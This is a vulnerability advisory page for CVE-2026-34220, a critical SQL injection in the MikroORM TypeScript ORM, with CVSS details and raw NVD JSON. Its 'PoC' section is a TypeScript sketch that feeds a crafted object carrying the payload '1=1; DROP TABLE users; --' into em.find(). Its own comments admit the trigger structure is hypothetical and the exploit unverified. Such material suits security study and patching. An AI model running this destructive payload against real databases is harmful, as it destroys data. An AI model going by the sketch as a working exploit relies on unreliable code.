Security Vulnerability Report
CVE-2026-34220 CVSS 9.8 CRITICAL

CVE-2026-34220

Published: 2026-03-31 16:16:32
Last Modified: 2026-04-03 15:16:45

Description

MikroORM is a TypeScript ORM for Node.js based on Data Mapper, Unit of Work and Identity Map patterns. Prior to versions 6.6.10 and 7.0.6, there is a SQL injection vulnerability when specially crafted objects are interpreted as raw SQL query fragments. This issue has been patched in versions 6.6.10 and 7.0.6.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:mikro-orm:mikroorm:*:*:*:*:*:node.js:*:* - VULNERABLE
cpe:2.3:a:mikro-orm:mikroorm:*:*:*:*:*:node.js:*:* - VULNERABLE
MikroORM < 6.6.10
MikroORM < 7.0.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
typescript
// Vulnerable concept for CVE-2026-34220
// This demonstrates how a crafted object might be interpreted as raw SQL
//
// NOTE(review): this is an illustrative sketch, not a verified reproducer.
// The advisory text on this page only says that "specially crafted objects are
// interpreted as raw SQL query fragments"; it does not name the object shape,
// and the `__raw` key below is explicitly marked hypothetical in the snippet.
// The snippet also mixes TypeScript-only syntax (decorators, `id!: number`)
// with CommonJS `require`, so it needs a TS toolchain with decorator support
// (and the `@mikro-orm/core` package) to compile at all.
//
// Mitigation stated on this page: upgrade to MikroORM 6.6.10 / 7.0.6 or later.
// Defensive practice regardless of version: never pass a request body or other
// untrusted object straight into `em.find()` as the filter; build the filter
// from validated, whitelisted fields instead.
const { MikroORM } = require('@mikro-orm/core');
const { Entity, PrimaryKey, Property } = require('@mikro-orm/core'); // same module required twice; one destructuring would do

// Minimal entity so the example has a table to query against.
@Entity()
class User {
  @PrimaryKey()
  id!: number;

  @Property()
  name!: string;
}

/**
 * Initialises the ORM, issues a single `find` with a crafted filter object, and
 * closes the connection. Connection details (`dbName`, `type`) are placeholders.
 *
 * Note that `MikroORM.init()` runs outside the try/catch below, so an init
 * failure rejects `main()` rather than being logged by the catch branch.
 */
async function main() {
  const orm = await MikroORM.init({
    entities: [User],
    dbName: 'test_db',
    type: 'postgresql', // Example database type
  });
  // Forked EntityManager so this request has its own identity map.
  const em = orm.em.fork();

  // In vulnerable versions, an object like this might be treated as a raw SQL fragment
  // instead of a safe parameter, leading to SQL Injection.
  const maliciousInput = {
    // Hypothetical internal structure that triggers the vulnerability
    __raw: "1=1; DROP TABLE users; --"
  };

  try {
    // If the ORM interprets 'maliciousInput' as raw SQL:
    // SELECT * FROM users WHERE 1=1; DROP TABLE users; --
    // On a patched version the expected outcome is that the object is treated
    // as an ordinary (and here, meaningless) filter rather than raw SQL.
    const users = await em.find(User, maliciousInput);
    console.log('Exploit successful:', users);
  } catch (e) {
    console.error('Error:', e);
  } finally {
    // Always release the connection, whether the query succeeded or threw.
    await orm.close();
  }
}

// NOTE(review): the returned promise is not awaited or given a `.catch()`, so a
// rejection from `main()` (e.g. a failed `MikroORM.init`) surfaces as an
// unhandled rejection.
main();

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-34220", "sourceIdentifier": "[email protected]", "published": "2026-03-31T16:16:32.127", "lastModified": "2026-04-03T15:16:45.420", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "MikroORM is a TypeScript ORM for Node.js based on Data Mapper, Unit of Work and Identity Map patterns. Prior to versions 6.6.10 and 7.0.6, there is a SQL injection vulnerability when specially crafted objects are interpreted as raw SQL query fragments. This issue has been patched in versions 6.6.10 and 7.0.6."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", 
"valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mikro-orm:mikroorm:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "6.6.10", "matchCriteriaId": "0FEF8C0C-0A0A-4580-B601-D588C9E81FB2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mikro-orm:mikroorm:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.0.6", "matchCriteriaId": "BC38F0C3-2043-4A5D-9FFF-CA1F7E295BD3"}]}]}], "references": [{"url": "https://github.com/mikro-orm/mikro-orm/security/advisories/GHSA-gwhv-j974-6fxm", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}